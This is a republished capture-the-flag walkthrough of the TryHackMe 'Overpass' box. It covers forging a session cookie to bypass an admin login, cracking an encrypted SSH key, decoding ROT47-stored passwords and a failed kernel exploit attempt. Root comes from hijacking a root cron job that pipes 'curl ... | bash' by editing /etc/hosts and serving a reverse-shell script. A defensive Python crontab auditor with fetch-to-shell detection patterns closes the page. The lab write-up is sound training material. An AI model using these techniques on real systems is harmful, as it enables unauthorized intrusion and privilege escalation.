TryHackMe Overpass 1 – CompSci Students Creating a PW Manager (Gone Bad) : Benjamin Reitz

by: Benjamin Reitz
The post content below is copied from Finxter.



PREMISE

The premise of the box is that a group of computer science students has created a password encryption/decryption tool.

👉 "What happens when a group of broke Computer Science students try to make a password manager? Obviously a perfect commercial success!" 

We are tasked with hacking our way into their server as the root user.

This capture-the-flag challenge on TryHackMe involves cookie creation and file spoofing in order to escalate privileges to the root user. It is rated as an easy box. If you don’t like spoilers, I’d recommend trying this free hacking challenge first before reading any further.

This box is the first in a three-part series. In part two, we will be doing some basic forensics after a cyber attack hits the Overpass server.

And in part three we will prove to the Overpass developers that they need to make some security upgrades to their server hosting.

First, let’s record our IPs and get them ready to export as Linux variables.

export targetIP=10.10.179.249
export myIP=10.6.2.23

ENUMERATION

A simple nmap scan shows the following results:

┌─[kalisurfer@parrot]─[~/THM/overpass-walkthrough]
└──╼ $sudo nmap $targetIP
[sudo] password for kalisurfer:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-21 06:01 EST
Nmap scan report for 10.10.179.249
Host is up (0.087s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 8.44 seconds
---

Nothing is surprising here. These are the standard ports for HTTP web applications and ssh services. 

Next, we’ll run a dirb scan to enumerate directories. Our dirb scan results reveal a few interesting directories. We’ll take a closer look into each of these leads.

/admin
/aboutus
/css
/downloads

We find the plaintext source code in the /downloads folder!

This will almost certainly be worth looking at closely for more information about the encryption mechanism. Publishing the source code is the first of several horrible decisions the Overpass dev team has made with their password storage program.

Some of the takeaways from examining the source code are:

  1. The encryption method used is a Caesar cipher with a rotation of 47 (ROT47). There is a link in the source code pointing to: https://socketloop.com/tutorials/golang-rotate-47-caesar-cipher-by-47-characters-example
  2. Encrypted passwords are saved locally in a hidden file .passlist in the root directory. This will probably be our method for retrieving the root password after we gain an initial foothold into the system.
  3. ROT47 is its own inverse (two rotations of 47 over the 94 printable ASCII characters bring you back to the start), which means that to decrypt a password all we have to do is run the ROT47 cipher code a second time.

There is also an executable of the password storage tool for each operating system. Downloading and running the Linux build, overpassLinux, shows that we can retrieve passwords as long as there is a hidden .overpass file in the /root directory.

INITIAL FOOTHOLD VIA COOKIE CREATION

We find a login portal at $targetIP/admin.

First, we inspect the login with Burp Suite and carefully examine the response to an unsuccessful username:password pair, noticing that the user is redirected to /admin after an unsuccessful login attempt.

Instead of wasting time attempting to brute-force our way in with a wordlist, we open the Firefox developer tools and discover that there are no stored cookies. If we create a new cookie named SessionToken with a path of “/” and reload the page, we find a hidden encrypted SSH key. Voila!

Since you keep forgetting your password, James, I've set up SSH keys for you.

If you forget the password for this, crack it yourself. I'm tired of fixing stuff for you.
Also, we really need to talk about this "Military Grade" encryption. - Paradox


It looks like our initial foothold will be as the user james. Let’s pause for a moment to collect our thoughts and plan out the next steps in our attack.

RETRIEVING THE PASSCODE FOR THE ENCRYPTED SSH FILE

This is our plan going forward to retrieve the passcode for the encrypted ssh file:

  1. Save the ssh key string as a new file (including the header and footer lines the key file needs).
  2. Use ssh2john to convert the key file into a hash format that john the ripper understands.
  3. Use john to crack that hash and recover the passcode for our ssh keyfile.

SSHing INTO USER JAMES

We can now log in as james over ssh with our trusty cracked passcode and the ssh keyfile. The user.txt flag is right there in James’ home folder.

!!!
Thm{65c                                6bf7}
!!!

USING OVERPASSLINUX TO RETRIEVE THE USER PASSWORD

Now that we are in as user James, we can run the overpass program again on the encoded string (,LQ?2>                                       8A:4EFC6QN.)

We hit a small snag, seeing that user James doesn’t have the proper permissions to run overpassLinux on the target machine. Using SCP we can copy James’ .overpass file to our attack machine. Running overpassLinux on our machine, we can now recover James’ account password.

I decided to use python3 to create a rot47 encryption/decryption script. A quick Google search brought up the following script:

def rot47(s):
    """Rotate every printable ASCII character (33-126) by 47 positions.

    Applying the function twice returns the original string, so the same
    code both encrypts and decrypts.
    """
    x = []
    for ch in s:
        j = ord(ch)
        if 33 <= j <= 126:
            # (j - 33 + 47) % 94 + 33, simplified
            x.append(chr(33 + ((j + 14) % 94)))
        else:
            x.append(ch)  # non-printable or non-ASCII characters pass through unchanged
    return ''.join(x)

s = ",LQ?2>                                       8A:4EFC6QN."
print(rot47(s))

Using nano to edit the script, I added a few tweaks to make it run smoothly on my machine and decrypt James’ password. 

[{"name":"System","pass":"                        "}]
!!!  (james password)

FURTHER ENUMERATION FOR POTENTIAL ATTACK VECTORS

First, I explored whether or not there are setuid binaries that user james can run on the system with the following command:

james@overpass-prod:~$ find /bin -perm -4000

—
/bin/fusermount
/bin/umount
/bin/su
/bin/mount
/bin/ping
—

Looking each of these binaries up on GTFOBins showed that there aren’t any clear paths forward yet…

Checking the kernel version on https://www.exploit-db.com/ showed a potential lead: a kernel exploit matching the target machine’s kernel (https://www.exploit-db.com/exploits/47163 (CVE-2019-13272)).

However, after compiling the exploit and running it on the target machine, the exploit failed saying that this machine is not vulnerable. 

Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
[.] Checking environment ...
[!] Warning: Could not find active PolKit agent
[.] Searching for known helpers ...
[.] Searching for useful helpers ...
[.] Ignoring blacklisted helper: /usr/lib/update-notifier/package-system-locked

Running the attack with Metasploit using the PTRACE_TRACEME module also failed, confirming my hunch that this isn’t a viable attack vector. 

FINDING A VIABLE ATTACK VECTOR FOR PRIVILEGE ESCALATION

Next, we check the crontab on the target machine for any automated programs set to run regularly:

cat /etc/crontab

And bingo! We found a viable escalation path!

The following line shows that every minute root fetches buildscript.sh from overpass.thm/downloads/src/ with curl and pipes it straight into bash:

 * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash

Here is our plan going forward to exploit this system misconfiguration:

  1. First, change the /etc/hosts file on the target machine to hijack the overpass.thm domain by pointing it at our attack machine’s IP.
  2. Use revshells.com to create a reverse shell payload that connects back to our netcat listener.
  3. Create a spoofed buildscript.sh containing the payload and place it at $myIP/downloads/src/buildscript.sh.
  4. Spin up a simple HTTP server on port 80 from our attack machine, serving the spoofed file from the matching directory (/downloads/src/).
  5. Start a Netcat listener on the port we specified in the reverse shell payload.
  6. Wait a maximum of 60 seconds to catch the reverse shell as root!
 Thm{7f33                            53bb}
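As an added defensive check, not part of the original walkthrough or the Overpass project, the following Python script parses a system crontab and flags exactly the kind of entry that made this escalation possible: a remote fetch piped straight into a shell, over plain HTTP, running as root. The crontab text is constructed for the example; the curl|bash line is the one quoted above.

```python
import re

# Constructed system crontab for this example; the curl|bash entry is the one
# quoted on this page, the other entries are made up.
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *\t* * *\troot    cd / && run-parts --report /etc/cron.hourly
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
*/5 * * * * backup /usr/local/bin/backup.sh
0 3 * * * root curl -s https://updates.example/check.sh -o /tmp/check.sh
"""

ASSIGNMENT = re.compile(r"^\w+\s*=")                          # SHELL=, PATH=, ...
FETCH_PIPED_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")
FETCH = re.compile(r"\b(curl|wget)\b")
HTTPS_URL = re.compile(r"https://")

def parse_system_crontab(text):
    """Return (schedule, user, command) tuples; system crontabs carry a user field."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ASSIGNMENT.match(line):
            continue  # blank lines, comments and VAR=value settings are not jobs
        fields = line.split(None, 6)
        if len(fields) == 7:
            jobs.append((" ".join(fields[:5]), fields[5], fields[6]))
    return jobs

def audit_jobs(text):
    """Flag jobs where a hostname redirect (DNS or /etc/hosts) becomes code execution."""
    findings = []
    for schedule, user, command in parse_system_crontab(text):
        reasons = []
        if FETCH_PIPED_TO_SHELL.search(command):
            reasons.append("remote content piped straight into a shell")
        if FETCH.search(command) and not HTTPS_URL.search(command):
            reasons.append("fetch over plain HTTP, so the server is never authenticated")
        if reasons:
            if user == "root":
                reasons.append("runs as root")
            findings.append({"schedule": schedule, "user": user,
                             "command": command, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in audit_jobs(SAMPLE_CRONTAB):
        print(f"[{f['user']}] {f['schedule']} {f['command']}\n    " + "; ".join(f["reasons"]))
```

Running it against a real /etc/crontab (read the file and pass its contents to audit_jobs) surfaces the overpass.thm entry while leaving the https download that is written to disk, and the local scripts, unflagged.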

December 25, 2022 at 08:18PM
The original post is available on Finxter by Benjamin Reitz.